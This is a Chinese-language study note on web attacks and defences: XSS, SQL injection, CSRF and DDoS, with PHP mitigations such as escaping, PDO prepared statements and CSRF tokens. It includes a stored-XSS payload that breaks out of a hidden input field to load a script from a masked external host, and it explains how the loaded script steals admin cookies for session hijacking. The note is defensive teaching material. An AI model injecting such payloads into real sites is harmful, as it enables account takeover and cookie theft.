XSS
描述:跨站脚本攻击
例子:
1、前台注入js,后台管理员登录访问页面时执行js,该js往第三方网站发送cookie和操作网址
2、用户注入js,其他用户阅读时弹窗关不掉
防范:
1、输入检查,过滤用户输入(htmlspecialchars\strip_tags\addslashes),做HTML转义,过滤script标签;
2、设置HttpOnly,禁止js获取cookie;
3、输出检查,不要直接输出用户提交,用htmlspecialchars转义后再展示;
4、输入内容长度限制;
1、前台输入:"><script src=http://***></script>
2、后台编辑页面未处理,直接输出 <input type="hidden" name="stime" value=""><script src=http://******></script>">
那么,script将会执行,引入新的外部script
3、外部script获取获取cookie和url,并且保存至外部服务器
4、携带cookie登陆,然后进行恶意操作
SQL注入
描述:输入数据过滤不严,导致执行恶意SQL语句
防范:
1、使用pdo;
2、过滤用户输入(addslashes、int);
$a = htmlspecialchars(addslashes(trim($this->getParam('a', 'id'))));// 注意先后顺序
3、sql关键字、%、%20等特殊字符过滤
问:为什么pdo能防范SQL注入?
答:查询语句和参数分开传送,两者独立。参数不会改变语句的结构。从根本上避免了SQL注入
$st = $pdo->prepare();// 发送sql
$st->bindParam();// 发送参数
$st->execute();// 执行
CSRF
描述:CSRF跨站点请求伪造。攻击者欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作。
例子:钓鱼网站事先拼接好url,用户点击钓鱼网站,然后请求曾经认证过的网站
防范:
1、检查Referer字段,验证请求来源;
2、添加校验token,也就是表单令牌
另:CSRF攻击的本质:攻击者能猜到url和参数。不需要获取cookie,进行攻击
解决办法:加token。攻击者无法跨域获取cookie里的token。从而 $_POST['token'] == $_COOKIE['token']通过不了
问:XXS与CSRF简单易懂的区别?
CSRF:是利用网站A本身的漏洞,去请求网站A的api。让用户自己访问黑客发送的链接。
XSS:是向网站A注入JS代码,然后执行,篡改网站A的内容或发送请求等。
DDoS攻击:分布式拒绝服务。就是利用大量合法的分布式服务器对目标发送请求,从而导致正常合法用户无法获得服务。
682
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
